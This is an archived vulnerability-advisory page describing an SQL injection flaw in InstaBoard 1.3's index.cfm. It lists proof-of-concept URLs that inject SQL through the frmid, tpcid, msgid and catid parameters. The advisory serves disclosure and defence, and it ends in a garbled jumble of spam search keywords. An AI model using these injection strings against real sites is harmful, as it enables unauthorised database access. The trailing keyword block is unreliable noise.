about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , InstaBoard Index.CFM SQL Injection Vulnerability


Title InstaBoard Index.CFM SQL Injection Vulnerability
Published 2003-04-14-12:00AM
Updated 2003-04-14-06:17PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this vulnerability has been credited to Jim Dew <jdew@cleannorth.org>.
Vulnerable  InstaBoard InstaBoard 1.3
Not Vulnerable  
Code   The following proof of concept was provided:

http://www.example.com/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select%20userid%20from%20users)
http://www.example.com/instaboard/index.cfm?frmid=1&tpcid=1%20SQL
http://www.example.com/instaboard/index.cfm?frmid=1%20SQL&tpcid=1
http://www.example.com/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1%20SQL&msgid=11
http://www.example.com/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1&msgid=11%20SQL
http://www.example.com/instaboard/index.cfm?catid=1%20SQL
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 03:57:25 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
A...sgalle windows XP www.woyaog cisco nac php board Aunte shopexd.as www.jingxi www.taobao Video+sex www.nuanqi SIMBUNAYAN Invision P t919t Sexblow mod_thrott u18143394. www.nuanqi cisco nac shop591157 p...ex1.ph simran vod.sky010 Exploits S p...ex1.ph p...3Fpage p...3Fpage Port 443 v w...,,vide php board mambo Remo www.hot fr modernbill www.xiayiz beyond.c.l maxcpm.inf news for c visual stu www.simply Crack Data www.jjkk36 Prime cups mambo Remo CMS is Fre Malayalase Se. Entity Enc cisco 2001 www.xhxwj. gadis dago